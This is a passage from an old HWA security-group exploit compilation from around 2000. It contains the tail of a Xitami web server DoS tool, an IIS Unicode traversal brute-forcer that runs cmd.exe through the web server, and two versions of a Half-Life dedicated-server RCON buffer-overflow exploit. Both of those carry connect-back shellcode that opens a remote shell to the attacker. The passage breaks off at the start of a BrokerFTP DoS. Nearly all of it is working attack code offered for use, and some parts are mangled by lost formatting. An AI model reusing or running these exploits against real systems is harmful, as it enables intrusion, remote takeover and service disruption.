"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\n\n"; get[1] = " Please stand by a while when rebooting the system...\n "; if (argc<2) { printf("Usage: ./xitami \n"); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); close(sock); while(count++ < 1) { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } for(numin=0;numin < 1024;numin++) { get[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, get, sizeof(get),0); } } @HWA 331.0 [HWA] unicode M$ hack similar to those seen used recently by: Grazer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://hwa-security.net http://hwa-security.net/hot.html Check http://hwa-security.net for more also check http://hwa-security.net/hot.html for new releases. /* HWA PRIVATE!!!!!! DO NOT DISTRIBUTE!!!!! * --------------------------------------------------------- * NT iis Multi-language unicode scanner :) * * Idea by pr0ix - pr0ix@hwa-security.net * Code by grazer - grazer@hwa-security.net * * Greets to all hwa-members : Cruciphux, pr0ix, pyra * forrest^, FProphet, eth0^, WhiteRuss, PhantasmP, xtremist, * base2op....and all other cool people i forgot (sorry) * * Please do not use this tool for illegal purposes! * If you do we are not responsible! * * grazer * * RELEASED by Cruciphux http://hwa-security.net/ * OCT 27 2000 * */ #include #include #include #include #include #define RETURN "../winnt/system32/cmd.exe?/c+dir\n\n" main(int argc, char *argv[]) { int fd; struct sockaddr_in sin; struct in_addr addr; struct hostent *he; char not_found[] = "404"; char recv_buffer[6024]; char temp[3]; char *try_to_find; int i; char char1, char3 = 'a'; char char2, char4; char percent = '%'; char charac1, charac2, charac3, charac4, procent; while(argc<2) { printf ("\n [----------------------------] \n"); printf (" [ NT IIS Unicode BruteForcer ] \n"); printf (" [----------------------------] \n"); printf (" [ usage : unibrute ] \n"); printf (" [ by : grazer ] \n\n"); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { printf("\n [ Cannot Find Host!.. ] \n\n"); exit(0); } printf("\n [ Starting NT Unicode Bruteforcer..]\n"); for (char1='a'; char1<='z'; char1++) { for (char3= 'a'; char3<='z'; char3++) { for (char2='0'; char2<='9'; char2++) { for (char4='0'; char4<='9'; char4++) { char buffer[1024] = "GET /scripts/.."; fd = socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *) &sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if(connect(fd, (struct sockaddr*)&sin, sizeof(sin))!=0) { printf ("\n [ Cannot Connect() to Host ] \n\n "); exit(0); } buffer[15] = percent; buffer[16] = char1; buffer[17] = char2; buffer[18] = percent; buffer[19] = char3; buffer[20] = char4; strcat(buffer, RETURN); fprintf(stdout, "."); send(fd, buffer, sizeof(buffer), 0); recv(fd, recv_buffer, sizeof(recv_buffer), 0); close(fd); bzero(buffer, sizeof(buffer)); try_to_find = strstr(recv_buffer,not_found); while(try_to_find == NULL) { printf ("\n [ Server is Vulnerable !! ]\n"); printf (" [ %c%c%c%c%c%c ]\n\n", percent, char1, char2, percent, char3 , char4); exit(0); } } } } } printf ("\n [ Sorry Nothing Found on Server.. ]\n"); } @HWA 332.0 [HWA] Release: Hlds Half life server vuln by csh ** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ** This was also released in another form by csh and another security team both code is included here with comments. http://hwa-security.net http://hwa-security.net/hot.html Check http://hwa-security.net for more also check http://hwa-security.net/hot.html for new releases. /* --- advisory here (vvvv) --- THIS IS A PRIVATE RELEASE - DO NOT DISTRIBUTE IT * distribution note: * released through hwa-security.net Oct 23 2000 * * EFNet #hwa-security contact@hwa-security.net * posted by csh --- end of advisory --- ----- tmd info tag ----- v HalfLife Dedicated Server (3.1.0.x) w october, 19th 2000 a Thiago Zaninotti (thiago@sekure.org) a Gustavo Scotti (scotti@sekure.org) g Tamanduah Sekure Labs (http://tamandua.sekure.org) i do not run this behind a masquerade server. the shellcode is a connect back i and it does probe for local address/port for buffer alignment. */ #include #include #include #include #include #include typedef unsigned long u32; typedef unsigned short u16; typedef unsigned char u8; /* shell code source code. jmp next back: popl %esi jmp start next: call back .string \"0123456789012345/bin/sh\" start: // now some adds to include the sockaddr stuff // fill in sin family xorl %eax, %eax incw %ax incw %ax movw %ax, (%esi) // FAMILY 2 = AF_INET xorl %ecx, %ecx movb $0x8, %cl movl %esi, %edi addl $0x8, %edi // now pad 0 sock_addr xorb %al, %al redo: movb %al, (%edi) incl %edi decl %ecx jnz redo // kernel socket buffer is allocated 0x20 after sockaddr // socket xorl %eax, %eax movl %eax, 0x28(%esi) // 0, TCP/IP incl %eax movl %eax, 0x24(%esi) // 1, SOCK_STREAM incl %eax movl %eax, 0x20(%esi) // 2, AF_INET leal 0x20(%esi), %ecx // params to socket syscall xorl %ebx, %ebx incl %ebx // ebx = 1 - function socket xor %eax, %eax addl $0x66, %eax // socket syscall int $0x80 // sycall int mov %eax, %edi // %edi is the socket descriptor // connect movl %eax, 0x20(%esi) // socket leal (%esi), %eax movl %eax, 0x24(%esi) // &sockaddr_in xorl %eax, %eax addl $0x10, %eax // sizeof(sockaddr_in) movl %eax, 0x28(%esi) leal 0x20(%esi), %ecx // params to socket syscall xorl %ebx, %ebx incl %ebx incl %ebx incl %ebx // ebx = 2 - function connect xorl %eax, %eax addl $0x66, %eax // socket syscall push %edi // save your socket descriptor int $0x80 // sycall int pop %edi // dup2 sock, 0 xorl %eax, %eax addl $0x3f, %eax movl %edi, %ebx xorl %ecx, %ecx int $0x80 // dup2 0, 1 xorl %eax, %eax addl $0x3f, %eax xorl %ebx, %ebx xorl %ecx, %ecx incl %ecx int $0x80 // dup2 0, 2 xorl %eax, %eax addl $0x3f, %eax xorl %ebx, %ebx xorl %ecx, %ecx incl %ecx incl %ecx int $0x80 // trivial shell-code movl %esi, %eax addl $0x18, %eax // endereco onde vai ficar ENVP movl %eax, 0x18(%esi) // *envp xorl %eax, %eax movb %al, 0x17(%esi) movl %eax, 0x1c(%esi) movb $0xb, %al leal 0x18(%esi), %ecx // params leal 0x1c(%esi), %edx // envp movl %esi, %ebx addl $0x10, %ebx int $0x80 xorl %eax, %eax incl %eax int $0x80 */ unsigned char shellcode[]= "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff.www.sekure.org." "\x2f\x62\x69\x6e\x2f" "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08" "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89" "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43" "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46" "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43" "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89" "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd" "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0" "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b" "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40" "\xcd\x80"; /* NET functions */ int udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size) { struct sockaddr_in server; int i,n; i = sizeof(server); n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i); *daddr = ntohl(server.sin_addr.s_addr); *port = ntohs(server.sin_port); return n; } int udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size) { struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons( port); server.sin_addr.s_addr = htonl( daddr); return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server)); } int udp_connect( u32 addr, u16 port) { struct sockaddr_in client; int new_fd; new_fd = socket( AF_INET, SOCK_DGRAM, 0); if (new_fd<0) return new_fd; bzero( (char *) &client, sizeof( client)); client.sin_family = AF_INET; client.sin_addr.s_addr = htonl( addr); client.sin_port = htons( port); if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0) return -1; /* cant bind local address */ return new_fd; } u32 dns2ip( u8 *host) { struct hostent *dns; u32 saddr; dns = gethostbyname( host); if (!dns) return 0xffffffff; bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length); return ntohl(saddr); } int async_read( int sock_r, int rettime) { fd_set fd_r; struct timeval tv; char try_ch[4]="/-\\|"; int r,j; for (r=0;r0) if (FD_ISSET(sock_r, &fd_r)) return sock_r; else return -1; } } return -1; } int get_server_info( int sock, u32 addr, u16 port) { u32 r_addr; u16 r_port; int n, i; u8 pkt[256], *str; pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff; sprintf(&pkt[4], "details"); n = udp_send(sock, addr, port, pkt, strlen(pkt)); printf(". connecting to the server... "); fflush(stdout); if (async_read(sock, 6)<0) goto server_down; n = udp_read(sock, &addr, &port, pkt, sizeof(pkt)); if (n<0) { server_down: printf("\bserver down!\r*\n"); exit(0); } printf("\bdone\n"); str = &pkt[4]; str+=strlen(str)+1; printf("\t server_name [%s]\n", str); str+=strlen(str)+1; printf("\t map_name [%s]\n", str); str+=strlen(str)+1; str+=strlen(str)+1; printf("\t game_name [%s]\n", str); str+=strlen(str)+1; printf("\tusers_online [%d of %d]\n", str[0], str[1]); str+=3; printf("\t remote_OS [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? "linux" : "unknown"))); if (str[1]=='w') return 2; if (str[1]=='l') return 1; return 0; } u32 retrieve_local_info(int sock, u8 *host) { struct sockaddr_in server; int soclen; soclen = sizeof(server); if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0) { printf("* error in getsockname\n"); exit(0); } snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port)); return htonl(server.sin_addr.s_addr); } int bind_tcp( int *port) { struct sockaddr_in mask_addr; int sock, portno=25000; /* base_port */ sock = socket( AF_INET, SOCK_STREAM, 0); if (sock<0) return sock; redo: mask_addr.sin_family = AF_INET; mask_addr.sin_port = htons( portno); mask_addr.sin_addr.s_addr = 0; if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0) { error: portno++; if (portno>26000) { printf("* no TCP port to bind in.\n"); exit(0); } goto redo; } if (listen( sock, 0)<0) goto error; printf(". TCP listen port number %d\n", portno); *port = portno; return sock; } wait_for_connect(int sock) { fd_set fds; u8 tmp[256]; int tcp, addr_len; struct sockaddr_in server; printf(". waiting for connect_back shellcode response... "); if (async_read(sock, 40)!=sock) { printf("\bfailed!\r*\n"); exit(0); } tcp = accept( sock, (struct sockaddr *)&server, &addr_len); printf("\bconnected\n. ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port)); close(sock); /* closing incoming socket */ printf(". congratulations. you have owned this one.\n"); sprintf(tmp,"uname -a; id\n"); send(tcp, tmp, strlen(tmp), 0); /* basic async mode */ while (1) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(tcp, &fds); if (select(tcp+1, &fds, NULL, NULL, NULL)>0) { if (FD_ISSET(0, &fds)) { int n; n = read(0, tmp, 256); if (n<0) goto end_conn; if (write(tcp, tmp, n)!=n) goto end_conn; } if (FD_ISSET(tcp, &fds)) { int n; n = read(tcp, tmp, 256); if (n<0) goto end_conn; if (write(0, tmp, n)!=n) goto end_conn; } } } end_conn: close(tcp); printf(". bye-bye. Stay tuned for more Tamandua Sekure Labs codes.\n"); } assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo) { u8 pkt[2048], *shell_ptr; struct sockaddr_in *sc_server; u32 ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40; int i, n, tcp, tcp_port; printf(". localinfo %s\n", linfo); tcp = bind_tcp( &tcp_port); sc_server = (struct sockaddr_in *)&shellcode[10]; sc_server->sin_addr.s_addr = htonl(laddr); sc_server->sin_port = htons(tcp_port); last_byte-=strlen(linfo); pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff; sprintf( &pkt[4], "rcon "); i = strlen(pkt); shell_ptr = &pkt[i]; /* find out how many nops we can push before shellcode */ n = last_byte - i - sizeof(shellcode)-1 - over_head; for (i=0;i * Gustavo Scotti (csh) * * Proof of concept - There is a remote exploitable buffer overflow * in Half Life server (3.1.0.x) for linux (HLDS). The problem is * related to the RCON command (Remote CONsole). * (port.) Existe um buffer overflow exploitavel no Half Life Server * (HLDS) relacionado ao comando RCON. * * After several tests, we found out the 'rcon' command is also vulnerable * to a format string attack which can lead to a remote exploitation. * (port) O comando RCON tambem e' vulneravel a um format string attack. * * YOU DO NOT NEED THE RCON PASSWORD TO EXPLOIT THIS VULNERABILITY, * which means any multiplayer server is vulnerable to the attack. * (port) Voce nao precisa de password para explorar esta vulnerabilidade, * o que significa que qualquer servidor e' vulneravel. * * Agradecimentos: Tamandua Sekure Labs - Fabio Ramos (framos@axur.org), * Eduardo Freitas, Marcos Sposito, Roberto Monteiro (casper), * Nelson Britto (stderr), Sabrina Monteiro, Gabriel Zaninotti e * Felipe Salum. A todos os leitores da Best of Security Brasil (BOS-BR). * * Respects: c_orb, el8.org (specially duke), meta, guys at core sdi, * the "infame" TOXYN.ORG (pt rocks) - r00t, pr0m, horizon, plaguez, * ratao and p.ulh.as/promisc.net crew. Greetz to AXUR.ORG too! guys at * sekure.org: vader, jamez, falcon and staff. * * WE DO NOT TAKE ANY RESPONSABILITY. DO NOT USE THIS CODE TO GAIN * UNAUTHORIZED ACCESS TO A REMOTE SERVER -- THIS IS NOT LEGAL. * * also thanks to botman (botman@mailandnews.com) and pudim. * Visit the brazilian security portal: http://www.securenet.com.br */ #include #include #include #include #include #include typedef unsigned long u32; typedef unsigned short u16; typedef unsigned char u8; unsigned char shellcode[]= "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff scotti@axur.org" "\x2f\x62\x69\x6e\x2f" "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08" "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89" "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43" "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46" "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43" "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89" "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd" "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0" "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b" "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40" "\xcd\x80"; /* NET functions */ int udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size) { struct sockaddr_in server; int i,n; i = sizeof(server); n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i); *daddr = ntohl(server.sin_addr.s_addr); *port = ntohs(server.sin_port); return n; } int udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size) { struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons( port); server.sin_addr.s_addr = htonl( daddr); return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server)); } int udp_connect( u32 addr, u16 port) { struct sockaddr_in client; int new_fd; new_fd = socket( AF_INET, SOCK_DGRAM, 0); if (new_fd<0) return new_fd; bzero( (char *) &client, sizeof( client)); client.sin_family = AF_INET; client.sin_addr.s_addr = htonl( addr); client.sin_port = htons( port); if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0) return -1; /* cant bind local address */ return new_fd; } u32 dns2ip( u8 *host) { struct hostent *dns; u32 saddr; dns = gethostbyname( host); if (!dns) return 0xffffffff; bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length); return ntohl(saddr); } int async_read( int sock_r, int rettime) { fd_set fd_r; struct timeval tv; char try_ch[4]="/-\\|"; int r,j; for (r=0;r0) if (FD_ISSET(sock_r, &fd_r)) return sock_r; else return -1; } } return -1; } int get_server_info( int sock, u32 addr, u16 port) { u32 r_addr; u16 r_port; int n, i; u8 pkt[256], *str; pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff; sprintf(&pkt[4], "details"); n = udp_send(sock, addr, port, pkt, strlen(pkt)); printf(". connecting to the server... "); fflush(stdout); if (async_read(sock, 6)<0) goto server_down; n = udp_read(sock, &addr, &port, pkt, sizeof(pkt)); if (n<0) { server_down: printf("\bserver down!\r*\n"); exit(0); } printf("\bdone\n"); str = &pkt[4]; str+=strlen(str)+1; printf("\t server_name [%s]\n", str); str+=strlen(str)+1; printf("\t map_name [%s]\n", str); str+=strlen(str)+1; str+=strlen(str)+1; printf("\t game_name [%s]\n", str); str+=strlen(str)+1; printf("\tusers_online [%d of %d]\n", str[0], str[1]); str+=3; printf("\t remote_OS [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? "linux" : "unknown"))); if (str[1]=='w') return 2; if (str[1]=='l') return 1; return 0; } u32 retrieve_local_info(int sock, u8 *host) { struct sockaddr_in server; int soclen; soclen = sizeof(server); if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0) { printf("error in getsockname\n"); exit(0); } snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port)); return htonl(server.sin_addr.s_addr); } int bind_tcp( int *port) { struct sockaddr_in mask_addr; int sock, portno=25000; /* base_port */ sock = socket( AF_INET, SOCK_STREAM, 0); if (sock<0) return sock; redo: mask_addr.sin_family = AF_INET; mask_addr.sin_port = htons( portno); mask_addr.sin_addr.s_addr = 0; if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0) { error: portno++; if (portno>26000) { printf("* no TCP port to bind in.\n"); exit(0); } goto redo; } if (listen( sock, 0)<0) goto error; printf(". TCP listen port number %d\n", portno); *port = portno; return sock; } wait_for_connect(int sock) { fd_set fds; u8 tmp[256]; int tcp, addr_len; struct sockaddr_in server; printf(". waiting for connect_back shellcode responde... "); if (async_read(sock, 15)!=sock) { printf("\bfailed!\r*\n"); exit(0); } tcp = accept( sock, (struct sockaddr *)&server, &addr_len); printf("\bconnected\n. ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port)); close(sock); /* closing incoming socket */ printf(". congratulations. you have owned this one.\n"); /* basic async mode */ while (1) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(tcp, &fds); if (select(tcp+1, &fds, NULL, NULL, NULL)>0) { if (FD_ISSET(0, &fds)) { int n; n = read(0, tmp, 256); if (n<0) goto end_conn; if (write(tcp, tmp, n)!=n) goto end_conn; } if (FD_ISSET(tcp, &fds)) { int n; n = read(tcp, tmp, 256); if (n<0) goto end_conn; if (write(0, tmp, n)!=n) goto end_conn; } } } end_conn: close(tcp); printf(". bye-bye. Stay tuned for more Tamandua Sekure Labs codes.\n"); } assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo) { u8 pkt[2048], *shell_ptr; struct sockaddr_in *sc_server; u32 ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40; int i, n, tcp, tcp_port; printf(". localinfo %s\n", linfo); tcp = bind_tcp( &tcp_port); sc_server = (struct sockaddr_in *)&shellcode[10]; sc_server->sin_addr.s_addr = htonl(laddr); sc_server->sin_port = htons(tcp_port); last_byte-=strlen(linfo); pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff; sprintf( &pkt[4], "rcon "); i = strlen(pkt); shell_ptr = &pkt[i]; /* find out how many nops we can push before shellcode */ n = last_byte - i - sizeof(shellcode)-1 - over_head; for (i=0;i\n"); exit(-1); } main(int argc, char **argv) { u32 addr, laddr; u16 port; int sock, i; u8 linfo[256], *tmp = NULL; printf(". half-life 3.1.0.x remote buffer-overflow for linux x86\n"); printf(". (c)2000, Tamandua Sekure Laboratories\n"); printf(". Authors: Thiago Zaninotti & Gustavo Scotti\n"); if (argc<2) usage(); tmp = (u8 *)strchr(argv[1], ':'); if (tmp) { *tmp = 0; tmp++; port = atoi(tmp); } else { printf(": port not found, using default 27015\n"); port = 27015; } addr = dns2ip(argv[1]); if (addr==0xffffffff) { printf("host not found!\n"); exit(0); } sock = udp_connect( addr, port); laddr = retrieve_local_info(sock, linfo); if (get_server_info(sock, addr, port)!=1) { printf("this is not a linux server. Make a shellcode to it and have fun\n"); exit(0); } assembly_shell_code(sock, addr, port, laddr, linfo); } @HWA 333.0 [HWA] Release: trans0ft brokerftp vuln by eth0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://hwa-security.net http://hwa-security.net/hot.html Check http://hwa-security.net for more also check http://hwa-security.net/hot.html for new releases. /**************************************************/ /*This proof-of-concept DoS was programmed in less*/ /*than 5 minutes (I was bored), and was programmed*/ /*from the information taken from USSR Labs white */ /*paper on TransSoft's Broker FTP Server */ /* */ /* eth0 of hwa */ /* 